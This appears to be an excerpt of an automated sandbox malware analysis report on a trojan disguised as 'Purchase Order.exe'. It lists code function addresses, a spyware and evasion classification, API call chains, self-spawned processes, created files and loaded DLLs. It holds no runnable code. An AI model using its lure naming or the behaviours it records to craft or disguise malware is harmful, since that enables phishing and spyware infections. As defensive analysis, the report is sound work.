            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAF8504_2_39CAF850
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAD8604_2_39CAD860
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA34604_2_39CA3460
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA4A784_2_39CA4A78
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA6E724_2_39CA6E72
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA6E704_2_39CA6E70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAB8704_2_39CAB870
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA4A744_2_39CA4A74
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA30084_2_39CA3008
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAC60F4_2_39CAC60F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA6A184_2_39CA6A18
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA461C4_2_39CA461C
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAE6104_2_39CAE610
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA46204_2_39CA4620
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAC6204_2_39CAC620
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA60304_2_39CA6030
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D156B84_2_39D156B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D15D584_2_39D15D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D104D04_2_39D104D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D17ED04_2_39D17ED0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D4D04_2_39D1D4D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D13FD74_2_39D13FD7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D116D84_2_39D116D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A9D84_2_39D1A9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D166DA4_2_39D166DA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D10DDF4_2_39D10DDF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D191DF4_2_39D191DF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1C1C04_2_39D1C1C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D104C04_2_39D104C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D17EC04_2_39D17EC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D136C84_2_39D136C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1ECC84_2_39D1ECC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D116C84_2_39D116C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A9C84_2_39D1A9C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1E7F14_2_39D1E7F1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D10DF04_2_39D10DF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D191F04_2_39D191F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D179F94_2_39D179F9
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D11FF84_2_39D11FF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1BCF84_2_39D1BCF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D148FC4_2_39D148FC
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A4FF4_2_39D1A4FF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D4E04_2_39D1D4E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D11FE74_2_39D11FE7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D13FE84_2_39D13FE8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D166E84_2_39D166E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1BCEC4_2_39D1BCEC
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1F1904_2_39D1F190
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D14D984_2_39D14D98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D183984_2_39D18398
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D9984_2_39D1D998
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D16B9F4_2_39D16B9F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D12D9E4_2_39D12D9E
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D112804_2_39D11280
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D19B804_2_39D19B80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D124804_2_39D12480
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1F1804_2_39D1F180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1C6864_2_39D1C686
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D183894_2_39D18389
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D124884_2_39D12488
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1C6884_2_39D1C688
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D14D884_2_39D14D88
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1AE8F4_2_39D1AE8F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1C1B14_2_39D1C1B1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D16BB04_2_39D16BB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1ECB74_2_39D1ECB7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D196B84_2_39D196B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D136B84_2_39D136B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1AEA04_2_39D1AEA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D156A74_2_39D156A7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D12DA84_2_39D12DA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D9A84_2_39D1D9A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D196AC4_2_39D196AC
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D188514_2_39D18851
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1CB504_2_39D1CB50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D109504_2_39D10950
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D13B584_2_39D13B58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1F6584_2_39D1F658
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D11B584_2_39D11B58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1B3584_2_39D1B358
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1DE5F4_2_39D1DE5F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D100404_2_39D10040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D175404_2_39D17540
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1CB404_2_39D1CB40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1F6474_2_39D1F647
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A0484_2_39D1A048
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D13B484_2_39D13B48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D15D484_2_39D15D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D112714_2_39D11271
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1DE704_2_39D1DE70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D144784_2_39D14478
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D170784_2_39D17078
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D109604_2_39D10960
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D188604_2_39D18860
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D144694_2_39D14469
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D11B684_2_39D11B68
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1B3684_2_39D1B368
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D170684_2_39D17068
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D19B6F4_2_39D19B6F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D100114_2_39D10011
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1FB114_2_39D1FB11
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A5104_2_39D1A510
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D162104_2_39D16210
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D18D174_2_39D18D17
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D152194_2_39D15219
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D129184_2_39D12918
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D0184_2_39D1D018
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1E8004_2_39D1E800
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D15D054_2_39D15D05
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1D0074_2_39D1D007
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D149084_2_39D14908
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D17A084_2_39D17A08
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1290E4_2_39D1290E
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1B8304_2_39D1B830
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D175304_2_39D17530
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D132384_2_39D13238
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1E3384_2_39D1E338
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1A0384_2_39D1A038
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D162204_2_39D16220
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1FB204_2_39D1FB20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1B8224_2_39D1B822
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D132294_2_39D13229
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D1E3294_2_39D1E329
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D152284_2_39D15228
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D18D284_2_39D18D28
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D3D0D04_2_39D3D0D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D36A804_2_39D36A80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D3E0604_2_39D3E060
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D357C04_2_39D357C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D325C04_2_39D325C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D341E04_2_39D341E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D30FE04_2_39D30FE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D33B904_2_39D33B90
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D351804_2_39D35180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D31F804_2_39D31F80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D33BA04_2_39D33BA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D309A04_2_39D309A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D34B404_2_39D34B40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D319404_2_39D31940
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D367604_2_39D36760
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D335604_2_39D33560
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D303604_2_39D30360
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D361104_2_39D36110
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D345004_2_39D34500
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D313004_2_39D31300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D361204_2_39D36120
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D32F204_2_39D32F20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D33EC04_2_39D33EC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D30CC04_2_39D30CC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D3F2C04_2_39D3F2C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D344F14_2_39D344F1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D35AE04_2_39D35AE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D328E04_2_39D328E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D338804_2_39D33880
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D306804_2_39D30680
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D3F2B04_2_39D3F2B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D354A04_2_39D354A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D322A04_2_39D322A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D332404_2_39D33240
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D300404_2_39D30040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D364404_2_39D36440
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D34E604_2_39D34E60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D31C604_2_39D31C60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D396114_2_39D39611
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D35E004_2_39D35E00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D32C004_2_39D32C00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D348204_2_39D34820
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D316204_2_39D31620
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4F1A04_2_39D4F1A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D413604_2_39D41360
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4F4C04_2_39D4F4C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D47AE04_2_39D47AE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D409D04_2_39D409D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D429D04_2_39D429D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4DBC04_2_39D4DBC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4A9C04_2_39D4A9C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D409C14_2_39D409C1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4F7CF4_2_39D4F7CF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4F7E04_2_39D4F7E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4C5E04_2_39D4C5E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D493E04_2_39D493E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4A3804_2_39D4A380
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4D5804_2_39D4D580
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4BFA04_2_39D4BFA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D48DA04_2_39D48DA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D413504_2_39D41350
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4CF404_2_39D4CF40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D49D404_2_39D49D40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4EB604_2_39D4EB60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D487604_2_39D48760
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4B9604_2_39D4B960
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4FB004_2_39D4FB00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D497004_2_39D49700
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4C9004_2_39D4C900
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D405084_2_39D40508
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4B3204_2_39D4B320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D481204_2_39D48120
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4E5204_2_39D4E520
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4C2C04_2_39D4C2C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D490C04_2_39D490C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D404F94_2_39D404F9
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4DEE04_2_39D4DEE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4ACE04_2_39D4ACE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D40E984_2_39D40E98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D40E874_2_39D40E87
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4BC804_2_39D4BC80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D48A804_2_39D48A80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4EE804_2_39D4EE80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4C2B14_2_39D4C2B1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4A6A04_2_39D4A6A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4D8A04_2_39D4D8A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4E8404_2_39D4E840
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D400404_2_39D40040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D484404_2_39D48440
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4B6404_2_39D4B640
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4D2604_2_39D4D260
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4A0604_2_39D4A060
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D400114_2_39D40011
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4E2004_2_39D4E200
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D47E004_2_39D47E00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4B0004_2_39D4B000
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D4CC204_2_39D4CC20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39D49A204_2_39D49A20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA18684_2_39EA1868
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA1F504_2_39EA1F50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA11804_2_39EA1180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA0AA04_2_39EA0AA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA2D204_2_39EA2D20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA03B84_2_39EA03B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA26384_2_39EA2638
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA18594_2_39EA1859
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA1F414_2_39EA1F41
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA11704_2_39EA1170
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA0A914_2_39EA0A91
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA2D104_2_39EA2D10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA00404_2_39EA0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA00274_2_39EA0027
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA03A84_2_39EA03A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39EA26284_2_39EA2628
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39F812404_2_39F81240
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39F88D584_2_39F88D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39F81E584_2_39F81E58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: String function: 00402ACE appears 52 times
            Source: Purchase Order.exeStatic PE information: invalid certificate
            Source: Purchase Order.exe, 00000004.00000002.3383976496.0000000036697000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
            Source: Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/18@3/4
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032BF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032BF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040451A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040451A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorouslyJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsq3120.tmpJump to behavior
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order.exeVirustotal: Detection: 12%
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
